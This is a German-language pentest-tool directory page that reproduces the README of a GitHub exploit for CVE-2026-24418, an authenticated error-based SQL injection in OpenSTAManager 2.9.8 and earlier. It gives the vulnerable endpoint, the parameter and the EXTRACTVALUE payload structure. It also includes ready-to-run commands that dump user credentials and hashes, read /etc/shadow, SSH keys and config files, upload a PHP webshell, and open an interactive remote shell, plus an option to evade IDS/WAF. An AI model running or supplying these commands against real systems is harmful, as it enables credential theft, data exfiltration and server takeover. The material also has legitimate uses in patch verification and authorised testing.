Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24418 — OpenSTAManager v2.9.8 und frühere Versionen enthalten eine kritische fehlerbasierte SQL-Injection-Schwachstelle im Bulk-Operations-Handler des Moduls Scadenzario (Zahlungsplan). | Kitploit
Tools/GitHubGitHub/bridgeralderson/cve-2026-24418
PasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingDatenbanksicherheit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
bridgeralderson/cve-2026-24418

CVE-2026-24418

OpenSTAManager v2.9.8 und frühere Versionen enthalten eine kritische fehlerbasierte SQL-Injection-Schwachstelle im Bulk-Operations-Handler des Moduls Scadenzario (Zahlungsplan).

Repository anzeigen
213vor 3 MonatenNoch nicht geprüft

CVE-2026-24418

OpenSTAManager <= 2.9.8 — Fehlerbasierte SQL-Injection im Scadenzario-Massenverarbeitungsmodul

Übersicht

FeldDetails
CVE IDCVE-2026-24418
SchweregradHOCH (8.8)
CWECWE-89: SQL-Injection
Betroffene VersionenOpenSTAManager <= 2.9.8
Angreifbarer Parameterid_records[] (POST-Array)
Angreifbarer Endpunkt/actions.php?id_module=18
AngriffstypFehlerbasierte SQL-Injection (EXTRACTVALUE)
AuthentifizierungErforderlich (jeder gültige Benutzeraccount)

Schwachstellendetails

OpenSTAManager v2.9.8 und frühere Versionen enthalten eine kritische fehlerbasierte SQL-Injection-Schwachstelle im Massenverarbeitungs-Handler für das Scadenzario-Modul (Zahlungsplan). Die Anwendung validiert nicht, ob die Elemente des id_records[]-Arrays Ganzzahlen sind, bevor sie in einer SQL IN()-Klausel verwendet werden, sodass authentifizierte Angreifer beliebige SQL-Befehle einschleusen und sensible Daten über XPATH-Fehlermeldungen extrahieren können.

Grundursache

  1. Einstiegspunkt — /actions.php empfängt id_records[] über POST
  2. Unzureichende Bereinigung — array_clean() entfernt nur leere Werte, validiert KEINE Datentypen
  3. Injektionspunkt — /modules/scadenzario/bulk.php übergibt unbereinigte Werte direkt in eine SQL IN()-Klausel
  4. Datenexfiltration — EXTRACTVALUE/UPDATEXML-Fehlermeldungen geben Abfrageergebnisse preis

Funktionen

FunktionBeschreibung
--infoDatenbankserver-Fingerprinting (Version, Benutzer, Hostname, OS, Pfade)
--privsMySQL-Berechtigungsaufzählung (FILE, SUPER, PROCESS)
--usersVollständiger Credential-Dump von zz_users mit automatischem Hash-Export
--dbsAlle zugänglichen Datenbanken aufzählen
--tablesTabellen mit Zeilenanzahlen auflisten
--columnsSpalten mit Typen und Null-Informationen auflisten
--dumpDatenextraktion aus beliebigen Tabellen/Spalten
--sqlAusführung benutzerdefinierter SQL-Abfragen
--file-readLesen von Serverdateien via LOAD_FILE() (/etc/passwd, Konfigurationsdateien, SSH-Schlüssel)
--file-read-hexHEX-kodiertes Dateilesen zum Umgehen von Filtern
--webshellHochladen einer PHP-Webshell via INTO DUMPFILE
--rceInteraktive Befehlsausführung über hochgeladene Webshell
-o / --outputAlle Ergebnisse in JSON, CSV und Hashcat/John-Formate speichern
--proxyHTTP-Proxy-Unterstützung (Burp Suite)
--delayAnforderungsverzögerung zur IDS/WAF-Umgehung

Installation

git clone https://github.com/BridgerAlderson/CVE-2026-24418.git
cd CVE-2026-24418
pip install requests

Verwendung

Authentifizierung

# Login with credentials
python3 exploit.py -t http://target.com -u admin -p password --info

# Use existing session cookie
python3 exploit.py -t http://target.com -c <PHPSESSID_VALUE> --info

Aufklärung

# Database info + privileges + user credentials
python3 exploit.py -t http://target.com -u admin -p secret --all

# Check MySQL privileges (FILE, SUPER, etc.)
python3 exploit.py -t http://target.com -u admin -p secret --privs

Extraktion von Anmeldedaten

# Dump users and auto-export hashes
python3 exploit.py -t http://target.com -u admin -p secret --users -o ./loot

# Output files:
#   ./loot/users.json          - Full user data
#   ./loot/users.csv           - CSV format
#   ./loot/hashes_hashcat.txt  - Hashcat format (mode 3200)
#   ./loot/hashes_john.txt     - John format (user:hash)

Datenbank-Aufzählung

# List all databases
python3 exploit.py -t http://target.com -u admin -p secret --dbs

# List tables in a specific database
python3 exploit.py -t http://target.com -u admin -p secret --tables -D openstamanager

# List columns of a table
python3 exploit.py -t http://target.com -u admin -p secret --columns -T zz_users

# Dump specific columns with row limit
python3 exploit.py -t http://target.com -u admin -p secret --dump -T zz_users -C username,password --limit 10

Dateilesen (LFI via SQL)

# Read /etc/passwd
python3 exploit.py -t http://target.com -u admin -p secret --file-read /etc/passwd

# Read application config (database credentials)
python3 exploit.py -t http://target.com -u admin -p secret --file-read /var/www/html/openstamanager/config.inc.php

# Read SSH keys
python3 exploit.py -t http://target.com -u admin -p secret --file-read /home/user/.ssh/id_rsa

# HEX mode (bypass character filters)
python3 exploit.py -t http://target.com -u admin -p secret --file-read-hex /etc/shadow

Remote-Code-Ausführung

# Upload webshell (auto-detects webroot)
python3 exploit.py -t http://target.com -u admin -p secret --webshell

# Upload webshell with specific webroot
python3 exploit.py -t http://target.com -u admin -p secret --webshell --webroot /var/www/html

# Interactive shell session
python3 exploit.py -t http://target.com -u admin -p secret --rce

# RCE will auto-upload webshell if none exists

Ausgabe & Berichterstellung

# Save everything to a directory
python3 exploit.py -t http://target.com -u admin -p secret --all -o ./loot

# Generated files:
#   db_info.json, privileges.json, users.json, users.csv,
#   hashes_hashcat.txt, hashes_john.txt

Netzwerkoptionen

# Through Burp Suite proxy
python3 exploit.py -t http://target.com -u admin -p secret --users --proxy http://127.0.0.1:8080

# With request delay (2 seconds between requests)
python3 exploit.py -t http://target.com -u admin -p secret --users --delay 2

# Skip SSL verification
python3 exploit.py -t https://target.com -u admin -p secret --info -k

Vollständige Optionsreferenz

Ziel: -t, --target Basis-URL des Ziels

Authentifizierung: -u, --user Benutzername für die Anmeldung -p, --password Passwort für die Anmeldung -c, --cookie Vorhandener PHPSESSID-Wert

Aufzählung: -D, --database Name der Zieldatenbank -T, --table Name der Zieltabelle -C, --columns-list Auszulesende Spalten (kommagetrennt) --limit Zeilenbegrenzung für Dumps

Aktionen: --info Datenbankserver-Informationen --users Anmeldedaten von zz_users auslesen --dbs Datenbanken aufzählen --tables Tabellen auflisten --columns Spalten auflisten (erfordert -T) --dump Daten auslesen (erfordert -T und -C) --sql QUERY Benutzerdefinierte SQL-Abfrage --all --info + --privs + --users ausführen --privs MySQL-Berechtigungen prüfen

Dateioperationen: --file-read PATH Datei via LOAD_FILE() lesen --file-read-hex PATH Datei via HEX-Kodierung lesen

Remote-Code-Ausführung: --webshell PHP-Webshell hochladen --webroot PATH Webroot-Pfad für den Shell-Upload --rce Interaktive Befehlsausführung

Ausgabe: -o, --output DIR Ergebnisse im Verzeichnis speichern

Netzwerk: -m, --module-id Modul-ID (Standard: 18) --proxy HTTP-Proxy-URL -k, --no-ssl-verify SSL-Überprüfung deaktivieren --delay Anforderungsverzögerung in Sekunden

Technische Details

Payload-Struktur

id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(<SQL_QUERY>)))#

EXTRACTVALUE-Zeichenlimit

MySQLs EXTRACTVALUE() gibt maximal ~32 Zeichen über XPATH-Fehler zurück. Das Tool teilt lange Ergebnisse automatisch mit SUBSTRING() in Blöcke:

SUBSTRING((<query>), 1, 31)    -- Chunk 1
SUBSTRING((<query>), 32, 31)   -- Chunk 2
...

Webshell-Upload-Mechanismus

Tool herunterladen